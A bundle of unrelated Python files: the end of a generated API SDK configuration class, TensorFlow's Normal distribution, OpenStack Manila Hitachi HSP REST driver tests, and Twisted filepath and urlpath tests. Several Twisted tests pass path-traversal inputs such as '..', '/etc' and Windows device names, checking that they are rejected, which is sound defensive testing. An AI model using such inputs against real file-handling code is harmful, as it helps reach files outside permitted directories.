# if debug status is False, turn off debug logging,
# setting log level to default `logging.WARNING`
for _, logger in six.iteritems(self.logger):
logger.setLevel(logging.WARNING)
# turn off httplib debug
httplib.HTTPConnection.debuglevel = 0
@property
def logger_format(self):
"""The logger format.
The logger_formatter will be updated when sets logger_format.
:param value: The format string.
:type: str
"""
return self.__logger_format
@logger_format.setter
def logger_format(self, value):
"""The logger format.
The logger_formatter will be updated when sets logger_format.
:param value: The format string.
:type: str
"""
self.__logger_format = value
self.logger_formatter = logging.Formatter(self.__logger_format)
def get_api_key_with_prefix(self, identifier):
"""Gets API key (with prefix if set).
:param identifier: The identifier of apiKey.
:return: The token for api key authentication.
"""
if self.refresh_api_key_hook is not None:
self.refresh_api_key_hook(self)
key = self.api_key.get(identifier)
if key:
prefix = self.api_key_prefix.get(identifier)
if prefix:
return "%s %s" % (prefix, key)
else:
return key
def get_basic_auth_token(self):
"""Gets HTTP basic authentication header (string).
:return: The token for basic HTTP authentication.
"""
username = ""
if self.username is not None:
username = self.username
password = ""
if self.password is not None:
password = self.password
return urllib3.util.make_headers(
basic_auth=username + ':' + password
).get('authorization')
def auth_settings(self):
"""Gets Auth Settings dict for api client.
:return: The Auth Settings information dict.
"""
auth = {}
if 'X-Api-Key' in self.api_key:
auth['apiKey'] = {
'type': 'api_key',
'in': 'header',
'key': 'X-Api-Key',
'value': self.get_api_key_with_prefix('X-Api-Key')
}
return auth
def to_debug_report(self):
"""Gets the essential information for debugging.
:return: The report for debugging.
"""
return "Python SDK Debug Report:\n"\
"OS: {env}\n"\
"Python Version: {pyversion}\n"\
"Version of the API: 2.0.0\n"\
"SDK Package Version: 2.1.0".\
format(env=sys.platform, pyversion=sys.version)
def get_host_settings(self):
"""Gets an array of host settings
:return: An array of host settings
"""
return [
{
'url': "https://api.cloud.telestream.net/tts/v1.0",
'description': "No description provided",
}
]
def get_host_from_settings(self, index, variables=None):
"""Gets host URL based on the index and variables
:param index: array index of the host settings
:param variables: hash of variable and the corresponding value
:return: URL based on host settings
"""
variables = {} if variables is None else variables
servers = self.get_host_settings()
try:
server = servers[index]
except IndexError:
raise ValueError(
"Invalid index {0} when selecting the host settings. "
"Must be less than {1}".format(index, len(servers)))
url = server['url']
# go through variables and replace placeholders
for variable_name, variable in server['variables'].items():
used_value = variables.get(
variable_name, variable['default_value'])
if 'enum_values' in variable \
and used_value not in variable['enum_values']:
raise ValueError(
"The variable `{0}` in the host URL has invalid value "
"{1}. Must be {2}.".format(
variable_name, variables[variable_name],
variable['enum_values']))
url = url.replace("{" + variable_name + "}", used_value)
return url
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Normal (Gaussian) distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from tensorflow.contrib.bayesflow.python.ops import special_math
from tensorflow.contrib.distributions.python.ops import distribution
from tensorflow.contrib.distributions.python.ops import kullback_leibler
from tensorflow.contrib.framework.python.framework import tensor_util as contrib_tensor_util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
class Normal(distribution.Distribution):
"""The scalar Normal distribution with mean and stddev parameters mu, sigma.
#### Mathematical details
The PDF of this distribution is:
```f(x) = sqrt(1/(2*pi*sigma^2)) exp(-(x-mu)^2/(2*sigma^2))```
#### Examples
Examples of initialization of one or a batch of distributions.
```python
# Define a single scalar Normal distribution.
dist = tf.contrib.distributions.Normal(mu=0., sigma=3.)
# Evaluate the cdf at 1, returning a scalar.
dist.cdf(1.)
# Define a batch of two scalar valued Normals.
# The first has mean 1 and standard deviation 11, the second 2 and 22.
dist = tf.contrib.distributions.Normal(mu=[1, 2.], sigma=[11, 22.])
# Evaluate the pdf of the first distribution on 0, and the second on 1.5,
# returning a length two tensor.
dist.pdf([0, 1.5])
# Get 3 samples, returning a 3 x 2 tensor.
dist.sample([3])
```
Arguments are broadcast when possible.
```python
# Define a batch of two scalar valued Normals.
# Both have mean 1, but different standard deviations.
dist = tf.contrib.distributions.Normal(mu=1., sigma=[11, 22.])
# Evaluate the pdf of both distributions on the same point, 3.0,
# returning a length 2 tensor.
dist.pdf(3.0)
```
"""
def __init__(self,
mu,
sigma,
validate_args=False,
allow_nan_stats=True,
name="Normal"):
"""Construct Normal distributions with mean and stddev `mu` and `sigma`.
The parameters `mu` and `sigma` must be shaped in a way that supports
broadcasting (e.g. `mu + sigma` is a valid operation).
Args:
mu: Floating point tensor, the means of the distribution(s).
sigma: Floating point tensor, the stddevs of the distribution(s).
sigma must contain only positive values.
validate_args: `Boolean`, default `False`. Whether to assert that
`sigma > 0`. If `validate_args` is `False`, correct output is not
guaranteed when input is invalid.
allow_nan_stats: `Boolean`, default `True`. If `False`, raise an
exception if a statistic (e.g. mean/mode/etc...) is undefined for any
batch member. If `True`, batch members with valid parameters leading to
undefined statistics will return NaN for this statistic.
name: The name to give Ops created by the initializer.
Raises:
TypeError: if mu and sigma are different dtypes.
"""
parameters = locals()
parameters.pop("self")
with ops.name_scope(name, values=[mu, sigma]) as ns:
with ops.control_dependencies([check_ops.assert_positive(sigma)] if
validate_args else []):
self._mu = array_ops.identity(mu, name="mu")
self._sigma = array_ops.identity(sigma, name="sigma")
contrib_tensor_util.assert_same_float_dtype((self._mu, self._sigma))
super(Normal, self).__init__(
dtype=self._sigma.dtype,
is_continuous=True,
is_reparameterized=True,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=[self._mu, self._sigma],
name=ns)
@staticmethod
def _param_shapes(sample_shape):
return dict(
zip(("mu", "sigma"), ([ops.convert_to_tensor(
sample_shape, dtype=dtypes.int32)] * 2)))
@property
def mu(self):
"""Distribution parameter for the mean."""
return self._mu
@property
def sigma(self):
"""Distribution parameter for standard deviation."""
return self._sigma
def _batch_shape(self):
return array_ops.broadcast_dynamic_shape(
array_ops.shape(self.mu), array_ops.shape(self.sigma))
def _get_batch_shape(self):
return array_ops.broadcast_static_shape(
self._mu.get_shape(), self.sigma.get_shape())
def _event_shape(self):
return constant_op.constant([], dtype=dtypes.int32)
def _get_event_shape(self):
return tensor_shape.scalar()
def _sample_n(self, n, seed=None):
shape = array_ops.concat(([n], array_ops.shape(self.mean())), 0)
sampled = random_ops.random_normal(
shape=shape, mean=0, stddev=1, dtype=self.mu.dtype, seed=seed)
return sampled * self.sigma + self.mu
def _log_prob(self, x):
return (-0.5 * math.log(2. * math.pi) - math_ops.log(self.sigma)
-0.5 * math_ops.square(self._z(x)))
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
def _log_cdf(self, x):
return special_math.log_ndtr(self._z(x))
def _cdf(self, x):
return special_math.ndtr(self._z(x))
def _log_survival_function(self, x):
return special_math.log_ndtr(-self._z(x))
def _survival_function(self, x):
return special_math.ndtr(-self._z(x))
def _entropy(self):
# Use broadcasting rules to calculate the full broadcast sigma.
sigma = self.sigma * array_ops.ones_like(self.mu)
return 0.5 * math.log(2. * math.pi * math.e) + math_ops.log(sigma)
def _mean(self):
return self.mu * array_ops.ones_like(self.sigma)
def _variance(self):
return math_ops.square(self.std())
def _std(self):
return self.sigma * array_ops.ones_like(self.mu)
def _mode(self):
return self._mean()
def _z(self, x):
"""Standardize input `x` to a unit normal."""
with ops.name_scope("standardize", values=[x]):
return (x - self.mu) / self.sigma
class NormalWithSoftplusSigma(Normal):
"""Normal with softplus applied to `sigma`."""
def __init__(self,
mu,
sigma,
validate_args=False,
allow_nan_stats=True,
name="NormalWithSoftplusSigma"):
parameters = locals()
parameters.pop("self")
with ops.name_scope(name, values=[sigma]) as ns:
super(NormalWithSoftplusSigma, self).__init__(
mu=mu,
sigma=nn.softplus(sigma, name="softplus_sigma"),
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
name=ns)
self._parameters = parameters
@kullback_leibler.RegisterKL(Normal, Normal)
def _kl_normal_normal(n_a, n_b, name=None):
"""Calculate the batched KL divergence KL(n_a || n_b) with n_a and n_b Normal.
Args:
n_a: instance of a Normal distribution object.
n_b: instance of a Normal distribution object.
name: (optional) Name to use for created operations.
default is "kl_normal_normal".
Returns:
Batchwise KL(n_a || n_b)
"""
with ops.name_scope(name, "kl_normal_normal", [n_a.mu, n_b.mu]):
one = constant_op.constant(1, dtype=n_a.dtype)
two = constant_op.constant(2, dtype=n_a.dtype)
half = constant_op.constant(0.5, dtype=n_a.dtype)
s_a_squared = math_ops.square(n_a.sigma)
s_b_squared = math_ops.square(n_b.sigma)
ratio = s_a_squared / s_b_squared
return (math_ops.square(n_a.mu - n_b.mu) / (two * s_b_squared) +
half * (ratio - one - math_ops.log(ratio)))
|
|
# Copyright (c) 2016 Hitachi Data Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
import json
import mock
import requests
import time
from manila import exception
from manila.share.drivers.hitachi.hsp import rest
from manila import test
from manila.tests.share.drivers.hitachi.hsp import fakes
class FakeRequests(object):
status_code = 0
headers = {}
content = ""
def __init__(self, status_code, content='null'):
self.status_code = status_code
self.headers = {'location': 'fake_location'}
self.content = content
def json(self):
return {'messages': [{'message': 'fake_msg'}]}
@ddt.ddt
class HitachiHSPRestTestCase(test.TestCase):
def setUp(self):
super(HitachiHSPRestTestCase, self).setUp()
self.hitachi_hsp_host = '172.24.47.190'
self.hitachi_hsp_username = 'hds_hnas_user'
self.hitachi_hsp_password = 'hds_hnas_password'
self._driver = rest.HSPRestBackend(self.hitachi_hsp_host,
self.hitachi_hsp_username,
self.hitachi_hsp_password)
@ddt.data(202, 500)
def test__send_post(self, code):
self.mock_object(requests, "post", mock.Mock(
return_value=FakeRequests(code)))
if code == 202:
self.mock_object(rest.HSPRestBackend, "_wait_job_status",
mock.Mock())
self._driver._send_post('fake_url')
rest.HSPRestBackend._wait_job_status.assert_called_once_with(
'fake_location', 'COMPLETE')
else:
self.assertRaises(exception.HSPBackendException,
self._driver._send_post, 'fake_url')
@ddt.data({'code': 200, 'content': 'null'},
{'code': 200, 'content': 'fake_content'},
{'code': 500, 'content': 'null'})
@ddt.unpack
def test__send_get(self, code, content):
self.mock_object(requests, "get", mock.Mock(
return_value=FakeRequests(code, content)))
if code == 200:
result = self._driver._send_get('fake_url')
if content == 'null':
self.assertIsNone(result)
else:
self.assertEqual(FakeRequests(code, content).json(), result)
else:
self.assertRaises(exception.HSPBackendException,
self._driver._send_get, 'fake_url')
@ddt.data(202, 500)
def test__send_delete(self, code):
self.mock_object(requests, "delete", mock.Mock(
return_value=FakeRequests(code)))
if code == 202:
self.mock_object(rest.HSPRestBackend, "_wait_job_status",
mock.Mock())
self._driver._send_delete('fake_url')
rest.HSPRestBackend._wait_job_status.assert_called_once_with(
'fake_location', 'COMPLETE')
else:
self.assertRaises(exception.HSPBackendException,
self._driver._send_delete, 'fake_url')
def test_add_file_system(self):
url = "https://172.24.47.190/hspapi/file-systems/"
payload = {
'quota': fakes.file_system['properties']['quota'],
'auto-access': False,
'enabled': True,
'description': '',
'record-access-time': True,
'tags': '',
'space-hwm': 90,
'space-lwm': 70,
'name': fakes.file_system['properties']['name'],
}
self.mock_object(rest.HSPRestBackend, "_send_post", mock.Mock())
self._driver.add_file_system(fakes.file_system['properties']['name'],
fakes.file_system['properties']['quota'])
rest.HSPRestBackend._send_post.assert_called_once_with(
url, payload=json.dumps(payload))
def test_get_file_system(self):
url = ("https://172.24.47.190/hspapi/file-systems/list?name=%s" %
fakes.file_system['properties']['name'])
self.mock_object(rest.HSPRestBackend, "_send_get", mock.Mock(
return_value={'list': [fakes.file_system]}))
result = self._driver.get_file_system(
fakes.file_system['properties']['name'])
self.assertEqual(fakes.file_system, result)
rest.HSPRestBackend._send_get.assert_called_once_with(url)
def test_get_file_system_exception(self):
url = ("https://172.24.47.190/hspapi/file-systems/list?name=%s" %
fakes.file_system['properties']['name'])
self.mock_object(rest.HSPRestBackend, "_send_get",
mock.Mock(return_value=None))
self.assertRaises(exception.HSPItemNotFoundException,
self._driver.get_file_system,
fakes.file_system['properties']['name'])
rest.HSPRestBackend._send_get.assert_called_once_with(url)
def test_delete_file_system(self):
url = ("https://172.24.47.190/hspapi/file-systems/%s" %
fakes.file_system['id'])
self.mock_object(rest.HSPRestBackend, "_send_delete", mock.Mock())
self._driver.delete_file_system(fakes.file_system['id'])
rest.HSPRestBackend._send_delete.assert_called_once_with(url)
def test_resize_file_system(self):
url = ("https://172.24.47.190/hspapi/file-systems/%s" %
fakes.file_system['id'])
new_size = 53687091200
payload = {'quota': new_size}
self.mock_object(rest.HSPRestBackend, "_send_post", mock.Mock())
self._driver.resize_file_system(fakes.file_system['id'], new_size)
rest.HSPRestBackend._send_post.assert_called_once_with(
url, payload=json.dumps(payload))
def test_rename_file_system(self):
url = ("https://172.24.47.190/hspapi/file-systems/%s" %
fakes.file_system['id'])
new_name = "fs_rename"
payload = {'name': new_name}
self.mock_object(rest.HSPRestBackend, "_send_post", mock.Mock())
self._driver.rename_file_system(fakes.file_system['id'], new_name)
rest.HSPRestBackend._send_post.assert_called_once_with(
url, payload=json.dumps(payload))
def test_add_share(self):
url = "https://172.24.47.190/hspapi/shares/"
payload = {
'description': '',
'type': 'NFS',
'enabled': True,
'tags': '',
'name': fakes.share['name'],
'file-system-id': fakes.share['properties']['file-system-id'],
}
self.mock_object(rest.HSPRestBackend, "_send_post", mock.Mock())
self._driver.add_share(fakes.share['name'],
fakes.share['properties']['file-system-id'])
rest.HSPRestBackend._send_post.assert_called_once_with(
url, payload=json.dumps(payload))
@ddt.data({'fs_id': None,
'name': fakes.share['name'],
'url': 'https://172.24.47.190/hspapi/shares/list?'
'name=aa4a7710-f326-41fb-ad18-b4ad587fc87a'},
{'fs_id': fakes.share['properties']['file-system-id'],
'name': None,
'url': 'https://172.24.47.190/hspapi/shares/list?'
'file-system-id=33689245-1806-45d0-8507-0700b5f89750'})
@ddt.unpack
def test_get_share(self, fs_id, name, url):
self.mock_object(rest.HSPRestBackend, "_send_get",
mock.Mock(return_value={'list': [fakes.share]}))
result = self._driver.get_share(fs_id, name)
self.assertEqual(fakes.share, result)
rest.HSPRestBackend._send_get.assert_called_once_with(url)
def test_get_share_exception(self):
url = ("https://172.24.47.190/hspapi/shares/list?"
"name=aa4a7710-f326-41fb-ad18-b4ad587fc87a")
self.mock_object(rest.HSPRestBackend, "_send_get", mock.Mock(
return_value=None))
self.assertRaises(exception.HSPItemNotFoundException,
self._driver.get_share, None, fakes.share['name'])
rest.HSPRestBackend._send_get.assert_called_once_with(url)
def test_delete_share(self):
url = "https://172.24.47.190/hspapi/shares/%s" % fakes.share['id']
self.mock_object(rest.HSPRestBackend, "_send_delete")
self._driver.delete_share(fakes.share['id'])
rest.HSPRestBackend._send_delete.assert_called_once_with(url)
def test_add_access_rule(self):
url = "https://172.24.47.190/hspapi/shares/%s/" % fakes.share['id']
payload = {
"action": "add-access-rule",
"name": fakes.share['id'] + fakes.access_rule['access_to'],
"host-specification": fakes.access_rule['access_to'],
"read-write": fakes.access_rule['access_level'],
}
self.mock_object(rest.HSPRestBackend, "_send_post", mock.Mock())
self._driver.add_access_rule(fakes.share['id'],
fakes.access_rule['access_to'],
fakes.access_rule['access_level'])
rest.HSPRestBackend._send_post.assert_called_once_with(
url, payload=json.dumps(payload))
def test_delete_access_rule(self):
url = "https://172.24.47.190/hspapi/shares/%s/" % fakes.share['id']
payload = {
"action": "delete-access-rule",
"name": fakes.hsp_rules[0]['name'],
}
self.mock_object(rest.HSPRestBackend, "_send_post", mock.Mock())
self._driver.delete_access_rule(fakes.share['id'],
fakes.hsp_rules[0]['name'])
rest.HSPRestBackend._send_post.assert_called_once_with(
url, payload=json.dumps(payload))
@ddt.data({'value': {'list': fakes.hsp_rules}, 'res': fakes.hsp_rules},
{'value': None, 'res': []})
@ddt.unpack
def test_get_access_rules(self, value, res):
url = ("https://172.24.47.190/hspapi/shares/%s/access-rules" %
fakes.share['id'])
self.mock_object(rest.HSPRestBackend, "_send_get", mock.Mock(
return_value=value))
result = self._driver.get_access_rules(fakes.share['id'])
self.assertEqual(res, result)
rest.HSPRestBackend._send_get.assert_called_once_with(url)
@ddt.data({'list': [fakes.hsp_cluster]}, None)
def test_get_clusters(self, value):
url = "https://172.24.47.190/hspapi/clusters/list"
self.mock_object(rest.HSPRestBackend, "_send_get", mock.Mock(
return_value=value))
if value:
result = self._driver.get_cluster()
self.assertEqual(fakes.hsp_cluster, result)
else:
self.assertRaises(exception.HSPBackendException,
self._driver.get_cluster)
rest.HSPRestBackend._send_get.assert_called_once_with(url)
@ddt.data('COMPLETE', 'ERROR', 'RUNNING')
def test__wait_job_status(self, stat):
url = "fake_job_url"
json = {
'id': 'fake_id',
'properties': {
'completion-details': 'Duplicate NFS access rule exists',
'completion-status': stat,
},
'messages': [{
'id': 'fake_id',
'message': 'fake_msg',
}]
}
self.mock_object(rest.HSPRestBackend, "_send_get", mock.Mock(
return_value=json))
self.mock_object(time, "sleep")
if stat == 'COMPLETE':
self._driver._wait_job_status(url, 'COMPLETE')
rest.HSPRestBackend._send_get.assert_called_once_with(url)
elif stat == 'ERROR':
self.assertRaises(exception.HSPBackendException,
self._driver._wait_job_status, url, 'COMPLETE')
rest.HSPRestBackend._send_get.assert_called_once_with(url)
else:
self.assertRaises(exception.HSPTimeoutException,
self._driver._wait_job_status, url, 'COMPLETE')
rest.HSPRestBackend._send_get.assert_has_calls([
mock.call(url), mock.call(url), mock.call(url), mock.call(url),
mock.call(url),
])
|
|
import os, time, pickle, errno, zipfile
from twisted.python import filepath
from twisted.python.runtime import platform
from twisted.trial import unittest
class AbstractFilePathTestCase(unittest.TestCase):
f1content = "file 1"
f2content = "file 2"
def _mkpath(self, *p):
x = os.path.abspath(os.path.join(self.cmn, *p))
self.all.append(x)
return x
def subdir(self, *dirname):
os.mkdir(self._mkpath(*dirname))
def subfile(self, *dirname):
return open(self._mkpath(*dirname), "wb")
def setUp(self):
self.now = time.time()
cmn = self.cmn = os.path.abspath(self.mktemp())
self.all = [cmn]
os.mkdir(cmn)
self.subdir("sub1")
f = self.subfile("file1")
f.write(self.f1content)
f = self.subfile("sub1", "file2")
f.write(self.f2content)
self.subdir('sub3')
f = self.subfile("sub3", "file3.ext1")
f = self.subfile("sub3", "file3.ext2")
f = self.subfile("sub3", "file3.ext3")
self.all.sort()
self.path = filepath.FilePath(cmn)
def test_segmentsFromPositive(self):
"""
Verify that the segments between two paths are correctly identified.
"""
self.assertEquals(
self.path.child("a").child("b").child("c").segmentsFrom(self.path),
["a", "b", "c"])
def test_segmentsFromNegative(self):
"""Verify that segmentsFrom notices when the ancestor isn't an ancestor.
"""
self.assertRaises(
ValueError,
self.path.child("a").child("b").child("c").segmentsFrom,
self.path.child("d").child("c").child("e"))
def test_walk(self):
"""Verify that walking the path gives the same result as the known file
hierarchy.
"""
x = [foo.path for foo in self.path.walk()]
x.sort()
self.assertEquals(x, self.all)
def test_validSubdir(self):
"""Verify that a valid subdirectory will show up as a directory, but not as a
file, not as a symlink, and be listable.
"""
sub1 = self.path.child('sub1')
self.failUnless(sub1.exists(),
"This directory does exist.")
self.failUnless(sub1.isdir(),
"It's a directory.")
self.failUnless(not sub1.isfile(),
"It's a directory.")
self.failUnless(not sub1.islink(),
"It's a directory.")
self.failUnlessEqual(sub1.listdir(),
['file2'])
def test_invalidSubdir(self):
"""
Verify that a subdirectory that doesn't exist is reported as such.
"""
sub2 = self.path.child('sub2')
self.failIf(sub2.exists(),
"This directory does not exist.")
def test_validFiles(self):
"""
Make sure that we can read existent non-empty files.
"""
f1 = self.path.child('file1')
self.failUnlessEqual(f1.open().read(), self.f1content)
f2 = self.path.child('sub1').child('file2')
self.failUnlessEqual(f2.open().read(), self.f2content)
def zipit(dirname, zfname):
"""
create a zipfile on zfname, containing the contents of dirname'
"""
zf = zipfile.ZipFile(zfname, "w")
basedir = os.path.basename(dirname)
for root, dirs, files, in os.walk(dirname):
for fname in files:
fspath = os.path.join(root, fname)
arcpath = os.path.join(root, fname)[len(dirname)+1:]
# print fspath, '=>', arcpath
zf.write(fspath, arcpath)
zf.close()
from twisted.python.zippath import ZipArchive
class ZipFilePathTestCase(AbstractFilePathTestCase):
def setUp(self):
AbstractFilePathTestCase.setUp(self)
zipit(self.cmn, self.cmn+'.zip')
self.path = ZipArchive(self.cmn+'.zip')
self.all = [x.replace(self.cmn, self.cmn+'.zip') for x in self.all]
class FilePathTestCase(AbstractFilePathTestCase):
def test_getAndSet(self):
content = 'newcontent'
self.path.child('new').setContent(content)
newcontent = self.path.child('new').getContent()
self.failUnlessEqual(content, newcontent)
content = 'content'
self.path.child('new').setContent(content, '.tmp')
newcontent = self.path.child('new').getContent()
self.failUnlessEqual(content, newcontent)
def testSymbolicLink(self):
s4 = self.path.child("sub4")
s3 = self.path.child("sub3")
os.symlink(s3.path, s4.path)
self.failUnless(s4.islink())
self.failIf(s3.islink())
self.failUnless(s4.isdir())
self.failUnless(s3.isdir())
if not hasattr(os, "symlink"):
testSymbolicLink.skip = "Your platform does not support symbolic links."
def testMultiExt(self):
f3 = self.path.child('sub3').child('file3')
exts = '.foo','.bar', 'ext1','ext2','ext3'
self.failIf(f3.siblingExtensionSearch(*exts))
f3e = f3.siblingExtension(".foo")
f3e.touch()
self.failIf(not f3.siblingExtensionSearch(*exts).exists())
self.failIf(not f3.siblingExtensionSearch('*').exists())
f3e.remove()
self.failIf(f3.siblingExtensionSearch(*exts))
def testPreauthChild(self):
fp = filepath.FilePath('.')
fp.preauthChild('foo/bar')
self.assertRaises(filepath.InsecurePath, fp.child, '/foo')
def testStatCache(self):
p = self.path.child('stattest')
p.touch()
self.failUnlessEqual(p.getsize(), 0)
self.failUnlessEqual(abs(p.getmtime() - time.time()) // 20, 0)
self.failUnlessEqual(abs(p.getctime() - time.time()) // 20, 0)
self.failUnlessEqual(abs(p.getatime() - time.time()) // 20, 0)
self.failUnlessEqual(p.exists(), True)
self.failUnlessEqual(p.exists(), True)
# OOB removal: FilePath.remove() will automatically restat
os.remove(p.path)
# test caching
self.failUnlessEqual(p.exists(), True)
p.restat(reraise=False)
self.failUnlessEqual(p.exists(), False)
self.failUnlessEqual(p.islink(), False)
self.failUnlessEqual(p.isdir(), False)
self.failUnlessEqual(p.isfile(), False)
def testPersist(self):
newpath = pickle.loads(pickle.dumps(self.path))
self.failUnlessEqual(self.path.__class__, newpath.__class__)
self.failUnlessEqual(self.path.path, newpath.path)
def testInsecureUNIX(self):
self.assertRaises(filepath.InsecurePath, self.path.child, "..")
self.assertRaises(filepath.InsecurePath, self.path.child, "/etc")
self.assertRaises(filepath.InsecurePath, self.path.child, "../..")
def testInsecureWin32(self):
self.assertRaises(filepath.InsecurePath, self.path.child, r"..\..")
self.assertRaises(filepath.InsecurePath, self.path.child, r"C:randomfile")
if platform.getType() != 'win32':
testInsecureWin32.skip = "Consider yourself lucky."
def testInsecureWin32Whacky(self):
"""Windows has 'special' filenames like NUL and CON and COM1 and LPR
and PRN and ... god knows what else. They can be located anywhere in
the filesystem. For obvious reasons, we do not wish to normally permit
access to these.
"""
self.assertRaises(filepath.InsecurePath, self.path.child, "CON")
self.assertRaises(filepath.InsecurePath, self.path.child, "C:CON")
self.assertRaises(filepath.InsecurePath, self.path.child, r"C:\CON")
if platform.getType() != 'win32':
testInsecureWin32Whacky.skip = "Consider yourself lucky."
def testComparison(self):
self.assertEquals(filepath.FilePath('a'),
filepath.FilePath('a'))
self.failUnless(filepath.FilePath('z') >
filepath.FilePath('a'))
self.failUnless(filepath.FilePath('z') >=
filepath.FilePath('a'))
self.failUnless(filepath.FilePath('a') >=
filepath.FilePath('a'))
self.failUnless(filepath.FilePath('a') <=
filepath.FilePath('a'))
self.failUnless(filepath.FilePath('a') <
filepath.FilePath('z'))
self.failUnless(filepath.FilePath('a') <=
filepath.FilePath('z'))
self.failUnless(filepath.FilePath('a') !=
filepath.FilePath('z'))
self.failUnless(filepath.FilePath('z') !=
filepath.FilePath('a'))
self.failIf(filepath.FilePath('z') !=
filepath.FilePath('z'))
def testSibling(self):
p = self.path.child('sibling_start')
ts = p.sibling('sibling_test')
self.assertEquals(ts.dirname(), p.dirname())
self.assertEquals(ts.basename(), 'sibling_test')
ts.createDirectory()
self.assertIn(ts, self.path.children())
def testTemporarySibling(self):
ts = self.path.temporarySibling()
self.assertEquals(ts.dirname(), self.path.dirname())
self.assertNotIn(ts.basename(), self.path.listdir())
ts.createDirectory()
self.assertIn(ts, self.path.parent().children())
def testRemove(self):
self.path.remove()
self.failIf(self.path.exists())
def testCopyTo(self):
self.assertRaises((OSError, IOError), self.path.copyTo, self.path.child('file1'))
oldPaths = list(self.path.walk()) # Record initial state
fp = filepath.FilePath(self.mktemp())
self.path.copyTo(fp)
self.path.remove()
fp.copyTo(self.path)
newPaths = list(self.path.walk()) # Record double-copy state
newPaths.sort()
oldPaths.sort()
self.assertEquals(newPaths, oldPaths)
def testMoveTo(self):
self.assertRaises((OSError, IOError), self.path.moveTo, self.path.child('file1'))
oldPaths = list(self.path.walk()) # Record initial state
fp = filepath.FilePath(self.mktemp())
self.path.moveTo(fp)
fp.moveTo(self.path)
newPaths = list(self.path.walk()) # Record double-move state
newPaths.sort()
oldPaths.sort()
self.assertEquals(newPaths, oldPaths)
def testCrossMountMoveTo(self):
"""
"""
# Bit of a whitebox test - force os.rename, which moveTo tries
# before falling back to a slower method, to fail, forcing moveTo to
# use the slower behavior.
invokedWith = []
def faultyRename(src, dest):
invokedWith.append((src, dest))
if len(invokedWith) == 2:
raise OSError(errno.EXDEV, 'Test-induced failure simulating cross-device rename failure')
return originalRename(src, dest)
originalRename = os.rename
os.rename = faultyRename
try:
self.testMoveTo()
# A bit of a sanity check for this whitebox test - if our rename
# was never invoked, the test has probably fallen into
# disrepair!
self.failUnless(len(invokedWith) >= 2)
finally:
os.rename = originalRename
def testOpen(self):
# Opening a file for reading when it does not already exist is an error
nonexistent = self.path.child('nonexistent')
e = self.assertRaises(IOError, nonexistent.open)
self.assertEquals(e.errno, errno.ENOENT)
# Opening a file for writing when it does not exist is okay
writer = self.path.child('writer')
f = writer.open('w')
f.write('abc\ndef')
f.close()
# Make sure those bytes ended up there - and test opening a file for
# reading when it does exist at the same time
f = writer.open()
self.assertEquals(f.read(), 'abc\ndef')
f.close()
# Re-opening that file in write mode should erase whatever was there.
f = writer.open('w')
f.close()
f = writer.open()
self.assertEquals(f.read(), '')
f.close()
# Put some bytes in a file so we can test that appending does not
# destroy them.
appender = self.path.child('appender')
f = appender.open('w')
f.write('abc')
f.close()
f = appender.open('a')
f.write('def')
f.close()
f = appender.open('r')
self.assertEquals(f.read(), 'abcdef')
f.close()
# read/write should let us do both without erasing those bytes
f = appender.open('r+')
self.assertEquals(f.read(), 'abcdef')
# ANSI C *requires* an fseek or an fgetpos between an fread and an
# fwrite or an fwrite and a fread. We can't reliable get Python to
# invoke fgetpos, so we seek to a 0 byte offset from the current
# position instead. Also, Python sucks for making this seek
# relative to 1 instead of a symbolic constant representing the
# current file position.
f.seek(0, 1)
# Put in some new bytes for us to test for later.
f.write('ghi')
f.close()
# Make sure those new bytes really showed up
f = appender.open('r')
self.assertEquals(f.read(), 'abcdefghi')
f.close()
# write/read should let us do both, but erase anything that's there
# already.
f = appender.open('w+')
self.assertEquals(f.read(), '')
f.seek(0, 1) # Don't forget this!
f.write('123')
f.close()
# super append mode should let us read and write and also position the
# cursor at the end of the file, without erasing everything.
f = appender.open('a+')
# The order of these lines may seem surprising, but it is necessary.
# The cursor is not at the end of the file until after the first write.
f.write('456')
f.seek(0, 1) # Asinine.
self.assertEquals(f.read(), '')
f.seek(0, 0)
self.assertEquals(f.read(), '123456')
f.close()
# Opening a file exclusively must fail if that file exists already.
nonexistent.requireCreate(True)
nonexistent.open('w').close()
existent = nonexistent
del nonexistent
self.assertRaises((OSError, IOError), existent.open)
from twisted.python import urlpath
class URLPathTestCase(unittest.TestCase):
def setUp(self):
self.path = urlpath.URLPath.fromString("http://example.com/foo/bar?yes=no&no=yes#footer")
def testStringConversion(self):
self.assertEquals(str(self.path), "http://example.com/foo/bar?yes=no&no=yes#footer")
def testChildString(self):
self.assertEquals(str(self.path.child('hello')), "http://example.com/foo/bar/hello")
self.assertEquals(str(self.path.child('hello').child('')), "http://example.com/foo/bar/hello/")
def testSiblingString(self):
self.assertEquals(str(self.path.sibling('baz')), 'http://example.com/foo/baz')
# The sibling of http://example.com/foo/bar/
# is http://example.comf/foo/bar/baz
# because really we are constructing a sibling of
# http://example.com/foo/bar/index.html
self.assertEquals(str(self.path.child('').sibling('baz')), 'http://example.com/foo/bar/baz')
def testParentString(self):
# parent should be equivalent to '..'
# 'foo' is the current directory, '/' is the parent directory
self.assertEquals(str(self.path.parent()), 'http://example.com/')
self.assertEquals(str(self.path.child('').parent()), 'http://example.com/foo/')
